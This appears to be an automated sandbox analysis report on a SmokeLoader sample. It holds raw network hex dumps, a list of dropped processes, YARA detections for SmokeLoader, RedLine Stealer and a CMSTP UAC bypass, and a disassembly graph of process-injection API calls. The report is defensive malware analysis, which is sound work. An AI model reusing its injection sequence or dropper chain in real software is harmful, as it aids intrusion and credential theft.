12
                    Data Ascii: 20004-:{_U1^{dC6%<)~xWJ4ln7DI $v|Mf?bd2Q"=<rfk++r.e9#izF}87"$58x4{w+]ZKMn?\WS=3mu5}`<PDfedg!D+1{|-Y-LH6
                    2022-11-24 19:13:26 UTC440INData Raw: b6 05 93 57 1e 00
                    Data Ascii: W
                    2022-11-24 19:13:26 UTC440INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC440INData Raw: 31 66 66 38 0d 0a dd 76 7b 60 42 4d 26 2b 1f d9 38 e9 36 e7 54 5d 57 c1 2f 52 c7 43 65 e0 9b 12 6a 0a 94 c8 52 31 d9 14 3c eb a1 f5 87 e4 2f 1d 04 62 84 71 0f 10 c9 0d 76 99 11 dd ba 4e 7f 80 f2 15 fa 23 be aa e9 ca eb 93 a9 4c fe df 88 56 f6 a9 da 7c 16 46 38 ac 9b 6b 05 9c 73 d4 3b 7d d5 15 c6 81 65 8d 2a c2 e9 b4 59 08 12 f3 7b 6c 14 21 eb a3 eb 52 cb 45 46 54 2b d7 72 f3 f0 77 74 8b f5 76 df 89 5e b2 85 e7 ec c3 3b c2 7f ce 72 d9 a9 51 c7 17 ab 8c c3 cf f9 c5 ea c5 51 d7 12 21 8d 33 e1 f8 2e a5 0b ee 52 28 45 23 17 8f ee cb ab f9 fe 9f 5d ac ab 1d 39 fc e9 64 10 31 73 26 95 a0 2f cb 39 33 60 74 bd 1e a8 c2 ed 8b b7 23 8b 99 58 ce ee ba 1c cd 64 28 e0 5e 66 06 2b 2a 47 58 a4 c5 7d ce ac db 68 70 3d 62 93 ba e2 98 92 1a c6 82 fc 37 ff 80 9d a1 2b cc f3
                    Data Ascii: 1ff8v{`BM&+86T]W/RCejR1</bqvN#LV|F8ks;}e*Y{l!REFT+rwtv^;rQQ!3.R(E#]9d1s&/93`t#Xd(^f+*GX}hp=b7+
                    2022-11-24 19:13:26 UTC448INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC448INData Raw: e9 b4 f6 55 bc a5 b9 50 37 f3 7a 46 62 50 59 ba 90 f5 16 15 62 e6 66 80 da 5e 9d ab ac 86 5e 95 56 a8 ef fc bb a9 6a b1 51 18 d7 2b 57 70 82 aa 50 a2 c7 e5 c2 9e 0d fb f0 a9 31 e0 47 d0 db 58 47 6e 4d 8d 0c 83 82 2c 81 9b 58 ed 20 f2 ed a6 7e ec 33 2e 23 b4 e1 4f 14 c8 58 92 cb 33 b5 fb 74 30 78 e7 af 46 fe 18 85 03 c1 bd fd 6f a2 24 b9 ab fd 4a 9d fa 0a 8d 72 67 57 56 7c 3a 20 96 34 7d 34 cc 7c 53 5e b0 a2 89 a2 78 8e 33 1a d6 29 7e 99 d9 23 a5 a0 20 74 4d f7 c7 ca b0 0b 62 3d 52 2b b8 a8 0a ed 6c 10 83 fc 7f e1 2f 42 2e a0 39 c2 5b c2 b4 83 e1 ea 1c 85 34 57 fa 8d 9e 34 dc 60 66 81 75 fa a8 93 a0 9d 8c 6e d6 1d e6 1c af bc 85 3d 08 1f 95 ce a6 f2 83 ae 9c 7e a6 4f 59 4f 51 49 eb ea 43 a1 67 77 fc a8 ac e2 5c af f1 98 93 1c ba df 94 e5 5c 37 5b dc c3 52
                    Data Ascii: UP7zFbPYbf^^VjQ+WpP1GXGnM,X ~3.#OX3t0xFo$JrgWV|: 4}4|S^x3)~# tMb=R+l/B.9[4W4`fun=~OYOQICgw\\7[R
                    2022-11-24 19:13:26 UTC456INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC456INData Raw: 32 30 30 30 0d 0a 92 3d 88 ca b8 84 d0 5f 18 29 e9 38 f1 a6 d9 30 01 45 5e d7 66 f0 31 ac 37 51 11 0d 0f 9d 58 22 94 f4 ee 79 07 e1 8a ed ef fa d3 7c d0 7d 49 82 ac 45 8b 94 cd 7c 80 9a b2 58 03 1a b2 00 dc 8d 40 91 0b 04 35 1a 4a 69 79 10 79 b6 fb c1 b0 4e 2e b8 0f 2f 1c 05 86 cc 08 e5 19 f2 cc ca f1 04 ab 45 6a 47 9e 59 f9 9f 87 13 7b d5 d7 98 ea bc 60 76 ec c3 3e 4b 94 fe 0c c5 01 bf 7b 96 3b 33 fe cd 99 29 ca ca fc 2a 7d 7b af c3 23 6f cd 2f 47 0e d7 b6 c8 9c a5 e2 13 fe 59 9a 23 2c 7e 74 fe 4d 00 9c 86 c2 9a ee b2 40 83 02 e1 02 80 a7 1a 40 93 93 73 2d 7a 6b 4a aa 11 6b 2a bd db c4 65 bd f8 2e 06 34 49 f5 96 1c 55 bb 10 9c c8 cc 75 18 77 e6 a2 e2 58 29 cc 06 17 bb f7 52 8d e2 6e 4d 4c af 25 c6 b9 7e 3e 10 5b 0e be 61 b8 44 51 d9 fc 1a b4 18 21 9d 64
                    Data Ascii: 2000=_)80E^f17QX"y|}IE|X@5JiyyN./EjGY{`v>K{;3)*}{#o/GY#,~tM@@s-zkJk*e.4IUuwX)RnML%~>[aDQ!d
                    2022-11-24 19:13:26 UTC464INData Raw: 3b db a3 b8 91 5a
                    Data Ascii: ;Z
                    2022-11-24 19:13:26 UTC464INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC464INData Raw: 32 30 30 30 0d 0a 7e 4f 76 6f b6 af fe 21 f1 27 97 78 ac eb f0 1d 32 05 6e 39 ea 42 bf c5 4c 84 51 97 d7 71 68 fc 41 4d 01 c9 b0 21 20 de 6d dd 0c 2b a3 e5 56 f9 b1 eb 4c 4c 59 6f 83 b4 8b b1 76 e3 ea bf 96 2a 55 19 53 9b 85 19 67 58 7c ea 24 08 d8 46 71 49 55 c6 13 fa 36 f4 27 4f af 61 78 53 c0 3e 73 19 ba 0b 4c c9 13 e5 c3 ed 60 e0 62 3d 50 11 26 b8 e6 00 03 87 87 25 bd 45 52 26 c2 51 6f 97 9d 81 ef 4b 23 f6 f0 33 83 eb ba 81 bf 34 49 6b ad 1b d5 53 e3 6d 66 38 35 a0 69 a4 f6 b1 ed 47 85 fa 96 4c 95 2c ad 29 d2 13 8f 1d 1a e8 d4 6f e2 29 4b 3d cf 4e ee 59 f3 35 ca a1 0e 08 87 56 cc 49 8e 12 a7 0c d4 ed 1e 71 2a 13 cf ee d8 75 e3 55 89 e9 0d e4 9b f7 63 6e 34 02 27 b1 14 ee ac f5 c2 93 8f 02 33 1f 12 66 4b b9 5c 36 7e 02 88 98 17 19 44 fb 4f 48 cc bc d3
                    Data Ascii: 2000~Ovo!'x2n9BLQqhAM! m+VLLYov*USgX|$FqIU6'OaxS>sL`b=P&%ER&QoK#34IkSmf85iGL,)o)K=NY5VIq*uUcn4'3fK\6~DOH
                    2022-11-24 19:13:26 UTC472INData Raw: 41 a2 34 2b 20 27
                    Data Ascii: A4+ '
                    2022-11-24 19:13:26 UTC472INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC472INData Raw: 32 30 30 30 0d 0a 21 c2 93 75 0d 81 33 a3 30 b6 96 c5 6d da 17 82 f0 9c 4f 98 1f e1 ce e2 b1 14 0d 87 77 b5 41 4c f4 c6 b7 ec 44 e5 71 34 5a 23 1a 43 9e 89 54 34 27 44 e8 56 d2 5a 63 54 34 31 e8 01 14 b6 db 04 a8 29 56 90 a8 bb 03 0e 31 73 7b 29 b5 39 b3 cf 7d 1b 64 d1 af e8 87 df 8a 6f 23 c4 ed 79 48 d7 5c a3 90 53 b3 d0 1a 68 80 a3 81 d2 36 53 e8 63 66 24 59 8d 8e a1 16 d8 9f 5f b4 1b 2c 58 b0 48 0e 0e 31 dd dd d7 a4 b1 a8 69 14 1c c4 cd ff 55 65 97 36 c3 45 82 66 a9 34 e6 c7 83 32 f2 c3 4c 9e 44 1c 03 b0 a0 30 e3 df 32 5a fd a2 71 1c 05 74 5e ba c9 b3 38 ba 8e e2 96 f9 3a d1 5c 6a 23 7a 51 be 8f e3 e3 f5 ff f6 c0 d8 9b 5c 13 ca fd 10 ef 59 82 cf 66 a8 6a fb 54 80 01 37 53 ff ae e3 a2 1f b8 16 ae dc ab 36 70 05 03 fd 01 32 1c 39 d1 b3 38 d4 dc c1 e0 f3
                    Data Ascii: 2000!u30mOwALDq4Z#CT4'DVZcT41)V1s{)9}do#yH\Sh6Scf$Y_,XH1iUe6Ef42LD02Zqt^8:\j#zQ\YfjT7S6p298
                    2022-11-24 19:13:26 UTC480INData Raw: 2c a5 45 83 e6 1c
                    Data Ascii: ,E
                    2022-11-24 19:13:26 UTC480INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC480INData Raw: 32 30 30 30 0d 0a 6e ba ab 62 c9 29 b2 e7 6f 24 9f 2a 7f 1e b4 29 f7 c5 8e e0 cb dc 96 f0 57 5d 4a 3b d2 45 82 d3 7d 64 6b 3e 39 96 14 e0 21 85 51 92 08 da 28 fb d6 2b b6 1e 6f 1a 03 4d d6 f8 80 82 3a 07 6f 7f 27 de ef 13 5a 63 3e 7f a1 57 38 64 bd 66 5f 90 fb 4a 28 c6 e5 49 fc 3c 70 0a ec bb 38 1d f2 13 d4 8b 32 6c bf 3e 74 9d 80 2f 2d 67 fe 55 92 d2 ba fa f0 42 25 5f bf 9e fb 95 54 4e d6 bb 05 40 ca 73 73 c4 cf a2 42 aa 8d c1 0f c1 2f e6 3d 5b a6 a7 fa 2b 28 fe 9f f6 71 74 bc 50 dd ae 3c 8f 78 c9 a1 a4 c4 5d 96 ed 82 f1 26 cc f7 33 da 4b a4 cb e5 a0 2d b1 0a b3 85 1a e4 3f 47 55 90 58 89 84 1c 8f 72 82 3c 0b 4a 2b 3a 6a aa 02 e5 a3 64 61 6c 3d b1 78 61 3b b6 5c d9 eb 00 07 23 46 30 e2 f7 30 c9 5f 1a 08 90 63 61 17 40 a7 b3 eb ee 76 4a 40 3c b3 c3 f1 a5
                    Data Ascii: 2000nb)o$*)W]J;E}dk>9!Q(+oM:o'Zc>W8df_J(I<p82l>t/-gUB%_TN@ssB/=[+(qtP<x]&3K-?GUXr<J+:jdal=xa;\#F00_ca@vJ@<
                    2022-11-24 19:13:26 UTC488INData Raw: 61 b0 1e 89 2e 7d
                    Data Ascii: a.}
                    2022-11-24 19:13:26 UTC488INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC488INData Raw: 32 30 30 30 0d 0a 87 1a 00 f3 64 7a 67 ad de 2c 5b a0 ee d5 60 7b 26 7b e0 c8 6a f7 10 38 d1 81 d5 04 a0 23 a8 7b 22 75 68 0b 3d 50 b3 c7 0e 02 8e c1 f1 d5 43 b7 c3 01 80 d5 14 3f 93 e7 76 f3 25 1d 12 fa e9 ee 98 bc dc 12 7b 0d b8 a6 13 73 8f 0a 29 40 84 0c 2c 43 29 d4 b3 d1 b2 27 1f 89 0d a9 4e b9 c0 2b 71 d5 b5 1e 07 c7 45 25 5d 6f d1 d6 a8 35 0a 94 76 1b 18 51 10 af d5 63 6a 54 87 86 cb 72 a4 c8 59 0f fb d0 42 b6 d9 68 b6 e8 5e 02 87 1e 88 40 29 6e 7d 22 f5 8a 62 0f 1a 2b 38 7f cd 1e 85 e1 90 30 87 c6 e8 16 b4 e4 41 76 af 99 da 86 9a 4a ec 06 a8 86 7a 76 43 a1 6f 66 d1 4c 38 82 4c df e8 39 45 ac c3 b2 3f 23 c5 95 74 c7 cc f1 3f 9c 7e 0a e7 88 32 cf 26 75 28 0b 18 e4 f1 9d b6 93 9c 7c db d3 2b 11 f8 58 e7 bb 32 e2 04 8a 40 73 65 18 fe dc 3f a9 f3 70 62
                    Data Ascii: 2000dzg,[`{&{j8#{"uh=PC?v%{s)@,C)'N+qE%]o5vQcjTrYBh^@)n}"b+80AvJzvCofL8L9E?#t?~2&u(|+X2@se?pb
                    2022-11-24 19:13:26 UTC496INData Raw: 00 00 00 00 00 00
                    Data Ascii:
                    2022-11-24 19:13:26 UTC496INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC496INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 03 00 00 00 30 00 00 80 09 00 00 00 68 00 00 80 0e 00 00 00 80 00 00 80 10 00 00 00 98 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 01 00 00 00 b0 00 00 80 02 00 00 00 c8 00 00 80 03 00 00 00 e0 00 00 80 04 00 00 00 f8 00 00 80 05 00 00 00 10 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 00 00 28 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 81 00 00 00 40 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 58 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 17
                    Data Ascii: 20000h(@X
                    2022-11-24 19:13:26 UTC504INData Raw: bd 35 37 80 9a b3
                    Data Ascii: 57
                    2022-11-24 19:13:26 UTC504INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC504INData Raw: 31 30 33 38 0d 0a 47 7d 85 82 81 83 80 46 86 cb cb 37 85 cd be 3c 81 d1 c7 3b 87 cb c1 43 8f cc c3 40 83 c4 d1 3d 81 cd cc 36 7d ce c8 46 58 80 83 6d 38 84 a0 82 37 69 7f 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 d1 d2 3c 83 c8 d2 38 84 c6 c2 2e 35 82 96 a3 83 7f ba d3 4c 7d 97 c2 3d 84 82 80 7a 92 91 4a 83 ca cc 3e 82 c5 ca 46 82 ca cf 43 7d c2 c1 40 51 82 7f 5b 3b 80 94 85 5c 83 a4 ca 71 83 a4 cb 34 71 7e 84 80 cb c1 37 7e c7 cd 44 85 ca d2 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e d6 cb 3c 8a be d5 32 81 c5 d9 42 3a 85 8e 80 82 af ca c9 7e b2 b6 ca 7d 7c ae ce 3a 7a 9c a5 47 7f 83 83 8e ca ca 33 41 73 83 5a 42 85 a3 7f 50 7b 9d cd 7c 8f be c8 7c a9 c2 b7 6e 81 aa c6 47 70 7b 6e 85 bc d3 3b 00
                    Data Ascii: 1038G}F7<;C@=6}FXm87i|<8.5L}=zJ>FC}@Q[;\q4q~7~D5~<2B:~}|:zG3AsZBP{||nGp{n;


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:20:12:03
                    Start date:24/11/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:192000 bytes
                    MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    General

                    Target ID:1
                    Start time:20:12:11
                    Start date:24/11/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff618f60000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high

                    General

                    Target ID:4
                    Start time:20:13:01
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Roaming\gfgsrbs
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\gfgsrbs
                    Imagebase:0x400000
                    File size:192000 bytes
                    MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    General

                    Target ID:5
                    Start time:20:13:12
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\B87E.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\B87E.exe
                    Imagebase:0x400000
                    File size:1041408 bytes
                    MD5 hash:1BD9FB4ADE498938E6432D6C5D1E23A5
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    General

                    Target ID:6
                    Start time:20:13:19
                    Start date:24/11/2022
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
                    Imagebase:0x2a0000
                    File size:61952 bytes
                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:7
                    Start time:20:13:25
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Imagebase:0x400000
                    File size:520192 bytes
                    MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    General

                    Target ID:12
                    Start time:20:13:30
                    Start date:24/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\EBC4.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\EBC4.exe"
                    Imagebase:0x400000
                    File size:520192 bytes
                    MD5 hash:F06F222962C48BB7D822AC0FCD14CFD2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:4.4%
                      Dynamic/Decrypted Code Coverage:19.9%
                      Signature Coverage:11.9%
                      Total number of Nodes:538
                      Total number of Limit Nodes:13
                      execution_graph 8780 40e280 8781 40a2a9 __getptd_noexit 2 API calls 8780->8781 8782 40e28d 8781->8782 8830 40b340 8831 40a322 __getptd 2 API calls 8830->8831 8832 40b34d 8831->8832 8833 40b391 8832->8833 8834 40b3b4 8832->8834 8837 40b3af 8832->8837 8836 40a865 ___FrameUnwindToState 2 API calls 8833->8836 8833->8837 8834->8837 8838 40afdc 8834->8838 8836->8837 8840 40affb 8838->8840 8839 40a322 __getptd 2 API calls 8844 40b310 8839->8844 8845 40a322 __getptd 2 API calls 8840->8845 8859 40b0e0 FindHandler IsInExceptionSpec ___TypeMatch std::bad_exception::bad_exception 8840->8859 8841 40b2ef 8873 40aee8 8841->8873 8843 40b308 8843->8839 8844->8837 8846 40b05c 8845->8846 8846->8844 8847 40a322 __getptd 2 API calls 8846->8847 8848 40b06e 8847->8848 8849 40a322 __getptd 2 API calls 8848->8849 8851 40b07c ___BuildCatchObjectHelper 8849->8851 8850 40a322 __getptd 2 API calls 8852 40b0c7 8850->8852 8851->8850 8855 40a322 __getptd 2 API calls 8852->8855 8852->8859 8854 40a322 RtlEncodePointer RtlAllocateHeap __getptd 8854->8859 8856 40b0d5 8855->8856 8857 40a322 __getptd 2 API calls 8856->8857 8857->8859 8858 40a865 ___FrameUnwindToState 2 API calls 8858->8859 8859->8841 8859->8843 8859->8854 8859->8858 8861 40ae7a 8859->8861 8867 40aa84 8859->8867 8862 40ae85 ___BuildCatchObject 8861->8862 8863 40a865 ___FrameUnwindToState 2 API calls 8862->8863 8864 40aeb7 8863->8864 8865 40aacd FindHandlerForForeignException 2 API calls 8864->8865 8866 40aed8 8865->8866 8866->8859 8868 40aa90 8867->8868 8869 40a322 __getptd 2 API calls 8868->8869 8870 40aa95 8869->8870 8871 40a322 __getptd 2 API calls 8870->8871 8872 40aaba 8871->8872 8874 40aeff 8873->8874 8880 40afd7 8873->8880 8875 40a322 __getptd 2 API calls 8874->8875 8876 40af05 8875->8876 8877 40a322 __getptd 2 API calls 8876->8877 8881 40af1e 8876->8881 8878 40af13 8877->8878 8879 40a0cd _raise RtlEncodePointer 8878->8879 8879->8881 8880->8843 8881->8880 8882 40ae7a FindHandlerForForeignException 2 API calls 8881->8882 8882->8881 8315 402b02 8316 402b0b 8315->8316 8318 402bdc 8316->8318 8319 401869 8316->8319 8320 401877 8319->8320 8321 4018a0 Sleep 8320->8321 8326 4013d8 8321->8326 8323 4018bb 8324 4018cc 8323->8324 8338 4014a8 8323->8338 8324->8318 8328 4013df 8326->8328 8327 4013b1 8327->8323 8328->8327 8329 401547 NtDuplicateObject 8328->8329 8329->8327 8330 401564 NtCreateSection 8329->8330 8331 4015e4 NtCreateSection 8330->8331 8332 40158a NtMapViewOfSection 8330->8332 8331->8327 8334 401610 8331->8334 8332->8331 8333 4015ad NtMapViewOfSection 8332->8333 8333->8331 8336 4015cb 8333->8336 8334->8327 8335 40161a NtMapViewOfSection 8334->8335 8335->8327 8337 401641 NtMapViewOfSection 8335->8337 8336->8331 8337->8327 8339 4014b7 8338->8339 8340 401547 NtDuplicateObject 8339->8340 8349 401663 8339->8349 8341 401564 NtCreateSection 8340->8341 8340->8349 8342 4015e4 NtCreateSection 8341->8342 8343 40158a NtMapViewOfSection 8341->8343 8345 401610 8342->8345 8342->8349 8343->8342 8344 4015ad NtMapViewOfSection 8343->8344 8344->8342 8347 4015cb 8344->8347 8346 40161a NtMapViewOfSection 8345->8346 8345->8349 8348 401641 NtMapViewOfSection 8346->8348 8346->8349 8347->8342 8348->8349 8349->8324 9014 40c183 9018 40c195 __fileno 9014->9018 9019 40c1a1 9014->9019 9015 40c01f __flsbuf RtlEncodePointer 9015->9018 9016 411a36 __flush RtlEncodePointer 9016->9018 9017 4124fe __locking RtlEncodePointer 9017->9018 9018->9015 9018->9016 9018->9017 9018->9019 8671 40ba06 8673 40ba12 __locking 8671->8673 8672 40a2a9 __getptd_noexit 2 API calls 8674 40ba3e _siglookup __decode_pointer 8672->8674 8673->8672 8673->8674 8680 40ba47 __locking _raise 8673->8680 8675 40bae4 8674->8675 8674->8680 8681 40b922 8674->8681 8677 40eaf4 __lock RtlEncodePointer 8675->8677 8678 40baef 8675->8678 8677->8678 8679 40a0cd _raise RtlEncodePointer 8678->8679 8678->8680 8679->8680 8684 40b7e0 8681->8684 8683 40b933 8683->8675 8685 40b7ec __locking 8684->8685 8686 40eaf4 __lock RtlEncodePointer 8685->8686 8687 40b7f3 __decode_pointer 8686->8687 8688 40b8ac __locking _doexit __initterm 8687->8688 8689 40a0cd RtlEncodePointer _raise 8687->8689 8688->8683 8689->8687 8446 40d64b 8447 40d65c 8446->8447 8448 40d662 8447->8448 8449 40d5f2 RtlEncodePointer _write_multi_char 8447->8449 8449->8447 8783 40188b 8784 40188f 8783->8784 8785 4018a0 Sleep 8784->8785 8786 4013d8 7 API calls 8785->8786 8787 4018bb 8786->8787 8788 4014a8 7 API calls 8787->8788 8789 4018cc 8787->8789 8788->8789 8954 40b90c 8955 40b7e0 _doexit RtlEncodePointer 8954->8955 8956 40b91d 8955->8956 8443 40a0cd 8444 40a05b __encode_pointer RtlEncodePointer 8443->8444 8445 40a0d4 8444->8445 8734 402ace 8735 402a74 8734->8735 8735->8734 8736 401869 15 API calls 8735->8736 8737 402abf 8735->8737 8736->8737 8886 41034f 8887 41035b __locking 8886->8887 8888 40a322 __getptd 2 API calls 8887->8888 8889 410360 8888->8889 8890 41038e 8889->8890 8892 410372 8889->8892 8891 40eaf4 __lock RtlEncodePointer 8890->8891 8895 410377 8891->8895 8893 40a322 __getptd 2 API calls 8892->8893 8893->8895 8894 410385 __locking 8895->8894 8896 40b69c __amsg_exit RtlEncodePointer 8895->8896 8896->8894 8450 40fa50 8451 40fa77 8450->8451 8457 40fb36 8451->8457 8458 4134f2 8451->8458 8456 4132f3 ___crtLCMapStringA 2 API calls 8456->8457 8459 413505 8458->8459 8466 413338 8459->8466 8461 40faf1 8462 4132f3 8461->8462 8463 413306 8462->8463 8495 412f4e 8463->8495 8465 40fb11 8465->8456 8467 413359 8466->8467 8471 413371 __crtLCMapStringA_stat __freea 8467->8471 8472 416eab 8467->8472 8471->8461 8473 416ed5 8472->8473 8474 41348f 8473->8474 8480 412f18 8473->8480 8474->8471 8476 416ef4 8474->8476 8477 416fbe __freea 8476->8477 8479 416f34 __crtLCMapStringA_stat 8476->8479 8477->8471 8478 4111fd __calloc_crt 2 API calls 8478->8477 8479->8477 8479->8478 8483 412e64 8480->8483 8484 412e7d 8483->8484 8487 412c35 8484->8487 8489 412c4a 8487->8489 8490 412c5c 8489->8490 8491 413830 8489->8491 8490->8474 8492 413844 __isleadbyte_l 8491->8492 8493 4134f2 ___crtGetStringTypeA 2 API calls 8492->8493 8494 413851 8492->8494 8493->8494 8494->8489 8496 412f6f 8495->8496 8497 416eab ___ansicp 2 API calls 8496->8497 8502 412fe4 __crtLCMapStringA_stat __freea 8496->8502 8498 4131b0 8497->8498 8499 416ef4 ___convertcp 2 API calls 8498->8499 8498->8502 8500 4131db __crtLCMapStringA_stat 8499->8500 8501 416ef4 ___convertcp 2 API calls 8500->8501 8500->8502 8501->8502 8502->8465 8503 40be51 